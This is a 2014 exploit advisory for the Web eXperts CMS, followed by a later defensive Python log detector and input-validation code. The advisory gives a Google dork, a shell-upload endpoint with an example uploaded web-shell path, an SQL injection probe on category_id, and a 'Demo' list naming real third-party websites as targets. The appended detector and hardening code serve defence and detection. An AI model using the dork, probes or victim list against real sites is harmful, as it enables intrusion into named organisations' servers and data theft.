Web eXperts suffers from remote shell upload and remote SQL injection vulnerabilities. Note that this finding houses site-specific data.
29a0b07f364907ca5a8f9f9460b45a293c40de6d5feebac7fb0362ac7a1255f0
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Web eXperts FileUpload/SQLi vulnerabilities
[+] Date: 14-01-2014
[+] Category: WebApp
[+] Google Dork: :intext:"Website Design & Developed By Web eXperts"
[+] Tested on: KaliLinux
[+] Friend's blog: www.na3il.com
########################################################################################
+Exploit:
Web eXperts suffers from File Upload/SQLi vulnerabilities
1/File Upload:
+P.O.C:
127.0.0.1/[PATH]/addons/imagelibrary/insert_image.php?wysiwyg=
Shell path:
site.ltd/uploads/h4x3d.php.jpg
2/SQLi:
127.0.0.1/products.php?category_id=sql
Demo:
http://www.strivesports.com//products.php?category_id=1'
http://www.hangal.com.pk/addons/imagelibrary/insert_image.php?wysiwyg=
http://www.strivesports.com/addons/imagelibrary/insert_image.php?wysiwyg=
http://www.sarsonss.com/products.php?category_id=1'
http://www.sirgeeintl.com/products.php?category_id=1'
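Defender-side companion to the two issues above, added here and not part of the original advisory. It does two things: it runs a detector over web-server access logs for the traces these issues leave (a non-integer `category_id` on products.php, a POST to the insert_image.php endpoint, and a file with an executable extension such as `.php.jpg` being fetched from /uploads/), and it shows the hardened input checks that close both holes (integer-only `category_id`, single allow-listed image extension). Assumptions: Apache/nginx "combined" log format, a typical mod_php deployment where the listed extensions are executable, and the endpoint paths as given in the advisory; the log lines are constructed with TEST-NET addresses and are not from any real server.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log sample (TEST-NET IPs, no real hosts): one normal
# product view, one SQLi probe, one upload POST, one fetch of a double-extension
# file from /uploads/, and one benign image fetch.
LOG_LINES = [
    '203.0.113.7 - - [14/Jan/2014:10:01:02 +0000] "GET /products.php?category_id=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [14/Jan/2014:10:01:09 +0000] "GET /products.php?category_id=1%27 HTTP/1.1" 500 312',
    '203.0.113.7 - - [14/Jan/2014:10:02:15 +0000] "POST /addons/imagelibrary/insert_image.php?wysiwyg= HTTP/1.1" 200 88',
    '203.0.113.7 - - [14/Jan/2014:10:02:16 +0000] "GET /uploads/h4x3d.php.jpg HTTP/1.1" 200 1200',
    '198.51.100.4 - - [14/Jan/2014:10:03:00 +0000] "GET /uploads/logo.png HTTP/1.1" 200 9031',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# Assumption: extensions a mod_php server hands to the interpreter. Any of these
# appearing anywhere after the base name (shell.php, shell.php.jpg) is a red flag.
EXECUTABLE_EXTS = {"php", "phtml", "phar", "php3", "php4", "php5"}
ALLOWED_IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}
UPLOAD_ENDPOINT = "/addons/imagelibrary/insert_image.php"  # path from the advisory


def parse_log_line(line):
    """Split a combined-format line into fields; query values are URL-decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def is_executable_upload(filename):
    """True if any extension after the base name is executable (covers x.php and x.php.jpg)."""
    parts = filename.lower().split(".")
    return any(p in EXECUTABLE_EXTS for p in parts[1:])


def is_allowed_image_name(filename):
    """Hardened upload check: non-empty base, exactly one extension, on the allow-list."""
    parts = filename.lower().split(".")
    return len(parts) == 2 and parts[0] != "" and parts[1] in ALLOWED_IMAGE_EXTS


def validate_category_id(raw):
    """Hardened products.php parameter check: plain non-negative integer only.

    Anything else (including the 1' probe) is rejected before it reaches SQL;
    the returned int should then be bound as a query parameter, never concatenated.
    """
    if not re.fullmatch(r"\d{1,10}", raw):
        raise ValueError(f"rejected category_id: {raw!r}")
    return int(raw)


def detect(lines):
    """Return (kind, client_ip, evidence) tuples for the traces described above."""
    findings = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        if rec["path"].endswith("/products.php"):
            for value in rec["query"].get("category_id", []):
                try:
                    validate_category_id(value)
                except ValueError:
                    findings.append(("sqli-probe", rec["ip"], value))
        if rec["path"] == UPLOAD_ENDPOINT and rec["method"] == "POST":
            findings.append(("upload-endpoint-post", rec["ip"], rec["target"]))
        if rec["path"].startswith("/uploads/"):
            name = rec["path"].rsplit("/", 1)[-1]
            if is_executable_upload(name):
                findings.append(("executable-in-uploads", rec["ip"], name))
    return findings


if __name__ == "__main__":
    for kind, ip, evidence in detect(LOG_LINES):
        print(f"{kind:24} {ip:15} {evidence}")
```

The detector deliberately reuses the same `validate_category_id` check the application should apply, so the log rule and the fix cannot drift apart. Note that `is_allowed_image_name` is a filename check only; in a real upload handler it belongs alongside a server-generated filename, a content-type sniff of the bytes, and an uploads directory with script execution disabled.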
./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################